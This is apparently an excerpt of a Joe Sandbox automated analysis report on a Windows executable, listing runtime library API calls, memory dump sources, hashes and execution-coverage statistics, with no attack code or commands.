                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 1740715915-1810561636
                                                                                                                                                                                                                      • Opcode ID: 3d7cb76753f57e6504838f0d45254d60080cf8ffdbaa01e3a6b18905d90e843b
                                                                                                                                                                                                                      • Instruction ID: 17e4e12d9f534ee08bcabf9e654b54e35868e091858bacff7982722d3acbc026
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d7cb76753f57e6504838f0d45254d60080cf8ffdbaa01e3a6b18905d90e843b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8518F71A06602AFDB298F94D841BFA77A6EF44710F1C452DE815C7291D731EDC2CB92
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2583058844-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00625D6D
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00625E2E
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00625E95
                                                                                                                                                                                                                        • Part of subcall function 00624DB8: HeapAlloc.KERNEL32(00000000,00000000,?,?,00617AD5,?,?,?,?,?,0061119C,?,00000001), ref: 00624DEA
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00625EAA
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00625EBA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1096550386-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3132042578-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 168861036-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00613680
                                                                                                                                                                                                                      • int.LIBCPMT ref: 00613693
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::_Lockit.LIBCPMT ref: 006116BB
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::~_Lockit.LIBCPMT ref: 006116D5
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 006136C6
                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 006136DC
                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 006136E7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00612B4E
                                                                                                                                                                                                                      • int.LIBCPMT ref: 00612B61
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::_Lockit.LIBCPMT ref: 006116BB
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::~_Lockit.LIBCPMT ref: 006116D5
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00612B94
                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00612BAA
                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00612BB5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                                                                      • Opcode ID: e155ced75c498fc5aa2cb1a4c93379ef073b98ad029a4f30683b7a56ba0a4274
                                                                                                                                                                                                                      • Instruction ID: 1835bbca2873f2bb8dacc72d7ae319fd049153d40a7e7a5f172f62e0ff6bbd8a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e155ced75c498fc5aa2cb1a4c93379ef073b98ad029a4f30683b7a56ba0a4274
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68012B32504124ABCB14AF54D8558ED77AFDF81760B18014DF512AB391EF309E81C7C4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0065FE9A
                                                                                                                                                                                                                        • Part of subcall function 0065C82C: __getptd_noexit.LIBCMT ref: 0065C82F
                                                                                                                                                                                                                        • Part of subcall function 0065C82C: __amsg_exit.LIBCMT ref: 0065C83C
                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 0065FEA5
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 0065FEDB
                                                                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 0065FEE7
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 0065FEFB
                                                                                                                                                                                                                        • Part of subcall function 0065B9CC: __getptd_noexit.LIBCMT ref: 0065B9CC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2820776222-0
                                                                                                                                                                                                                      • Opcode ID: aea005d457412dc083991dfd3762a1a28235d87295d550c9b816c447a2a8411b
                                                                                                                                                                                                                      • Instruction ID: 4ebc10d292fad0fe9aaa8d936057c4f49ea910b850c2c54b3a7488f7cf2c4680
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aea005d457412dc083991dfd3762a1a28235d87295d550c9b816c447a2a8411b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E601DF71541B01EEEBA0BFB4D907B0C7BA2AF04722F20421DFC519B2D2CB7559498B9D
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0065E5FD
                                                                                                                                                                                                                        • Part of subcall function 0065C82C: __getptd_noexit.LIBCMT ref: 0065C82F
                                                                                                                                                                                                                        • Part of subcall function 0065C82C: __amsg_exit.LIBCMT ref: 0065C83C
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0065E614
                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 0065E622
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 0065E632
                                                                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0065E646
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                                                                      • Opcode ID: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
                                                                                                                                                                                                                      • Instruction ID: ad46a4e6391cb5e9bd54a2683fb09feb9601a610905be2272d0da6a99ddb23c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80F0F6329407109BDFA9BF785C0774E32A26F14363F10410DFC01A72D2CB255A08CA5D
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00619F1F
                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00619FD3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                      • String ID: #Da$csm
                                                                                                                                                                                                                      • API String ID: 3480331319-1849695722
                                                                                                                                                                                                                      • Opcode ID: aa9a8c981f725adaba7f72cf571791093933bb8a1f0684dcf23096d10c1f146a
                                                                                                                                                                                                                      • Instruction ID: fdf6bfcd2cf9a6799b9371bfa809c0c7010e3c71de8ad8e2014bcf3d06238e10
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa9a8c981f725adaba7f72cf571791093933bb8a1f0684dcf23096d10c1f146a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC41A634A00219AFCF10DF68C895ADEBBB7AF45314F188059F8159B3A2D731D996CFA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0061B1D3,00000000,?,00699C4C,?,?,?,0061B376,00000004,InitializeCriticalSectionEx,0062FC70,InitializeCriticalSectionEx), ref: 0061B22F
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0061B1D3,00000000,?,00699C4C,?,?,?,0061B376,00000004,InitializeCriticalSectionEx,0062FC70,InitializeCriticalSectionEx,00000000,?,0061B12D), ref: 0061B239
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0061B261
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                      • Opcode ID: f4505dfc4a4b8e66b5c80e83496fa049018c6180a197fe9ae274a770565206c9
                                                                                                                                                                                                                      • Instruction ID: a9ee49c8b4964771b4fc85236dab90408ef7564be3a8fc5b3fd6e71daeaf08d3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4505dfc4a4b8e66b5c80e83496fa049018c6180a197fe9ae274a770565206c9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1E0123078460CBAEF201B60EC06BE93A57AB05B40F145430FD0CA81A1DBB299668995
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetConsoleOutputCP.KERNEL32(4E0C77D7,00000000,00000000,00000000), ref: 00622835
                                                                                                                                                                                                                        • Part of subcall function 00626DC6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00625E8B,?,00000000,-00000008), ref: 00626E72
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00622A90
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00622AD8
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00622B7B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2112829910-0
                                                                                                                                                                                                                      • Opcode ID: 776fd10cc737a9492aaa0378287c389930847f94bc223a16c39187eb68e4760d
                                                                                                                                                                                                                      • Instruction ID: 8872e33fe63ac319c486742eb3073f1892e9c426be5b98f9f1eac57eaf582fe5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 776fd10cc737a9492aaa0378287c389930847f94bc223a16c39187eb68e4760d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3D15975D0066AAFCB15CFA8E8909EDBBB6FF09314F18412AE855EB351D630A942CF50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                                                                                      • Opcode ID: bac98b0d92627ac6fcbfd1674c851cb45d1b92f73563de9ef655c797b2eab497
                                                                                                                                                                                                                      • Instruction ID: 84a12339dd4aa0c41689265f130613ddc1d194b06958574757c497a9f3d9fdf2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bac98b0d92627ac6fcbfd1674c851cb45d1b92f73563de9ef655c797b2eab497
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90D1C5B191012EAEDB60EB94DC82AEDB7B9AF04704F1014EBE508B3151DA747F89CF65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                                                                                      • Opcode ID: bfaf77ebd1216219997c5792d14ad426763512d1a8b8f27a9b87d2163361209e
                                                                                                                                                                                                                      • Instruction ID: 305eb1bff119dc1283710fcdaef7db6cc73297c9503eab787b54c6977ee3feeb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfaf77ebd1216219997c5792d14ad426763512d1a8b8f27a9b87d2163361209e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A95188B1E4022A9BCB65EF64CC82A9DB3BDEB44705F4110E9E718B3151DB346F868F58
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                                                                                      • Opcode ID: 2a51c862d1c13de875fab134e18e2f80e2f19343a1c8e3f8ae0c5a767e789105
                                                                                                                                                                                                                      • Instruction ID: e652a779e23c4371c4f58d102ea93404f7d7a8a25ddb0d93e02807c34c324c98
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a51c862d1c13de875fab134e18e2f80e2f19343a1c8e3f8ae0c5a767e789105
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C341B471D4021DBADB14FBA0DC47FDE737DAF09700F144499B605A7180EAB5AB888FA9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0065E899
                                                                                                                                                                                                                        • Part of subcall function 0065C82C: __getptd_noexit.LIBCMT ref: 0065C82F
                                                                                                                                                                                                                        • Part of subcall function 0065C82C: __amsg_exit.LIBCMT ref: 0065C83C
                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 0065E8B9
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 0065E8C9
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0065E8F9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3170801528-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,0062ACEB,00000000,00000001,00000000,00000000,?,00622BCF,00000000,00000000,00000000), ref: 0062BCD2
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0062ACEB,00000000,00000001,00000000,00000000,?,00622BCF,00000000,00000000,00000000,00000000,00000000,?,00623156,00000000), ref: 0062BCDE
                                                                                                                                                                                                                        • Part of subcall function 0062BCA4: CloseHandle.KERNEL32(FFFFFFFE,0062BCEE,?,0062ACEB,00000000,00000001,00000000,00000000,?,00622BCF,00000000,00000000,00000000,00000000,00000000), ref: 0062BCB4
                                                                                                                                                                                                                      • ___initconout.LIBCMT ref: 0062BCEE
                                                                                                                                                                                                                        • Part of subcall function 0062BC66: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0062BC95,0062ACD8,00000000,?,00622BCF,00000000,00000000,00000000,00000000), ref: 0062BC79
                                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,0062ACEB,00000000,00000001,00000000,00000000,?,00622BCF,00000000,00000000,00000000,00000000), ref: 0062BD03
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Fputc
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 3078413507-1810561636
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?), ref: 0061A812
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EncodePointer
                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 006151C3
                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0061521F
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 593203224-1810561636
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 006115DC
                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00611614
                                                                                                                                                                                                                        • Part of subcall function 00615228: _Yarn.LIBCPMT ref: 00615247
                                                                                                                                                                                                                        • Part of subcall function 00615228: _Yarn.LIBCPMT ref: 0061526B
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                                                                      • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00621FA7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                                      • String ID: #Da$InitializeCriticalSectionEx
                                                                                                                                                                                                                      • API String ID: 2593887523-3396712175
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Alloc
                                                                                                                                                                                                                      • String ID: #Da$FlsAlloc
                                                                                                                                                                                                                      • API String ID: 2773662609-3740387315

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:4.4%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                      Signature Coverage:3%
                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                      Total number of Limit Nodes:30
